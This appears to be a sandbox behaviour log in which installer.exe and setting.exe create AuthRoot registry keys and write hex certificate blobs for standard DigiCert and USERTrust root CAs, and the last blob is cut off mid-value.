\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E setting.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c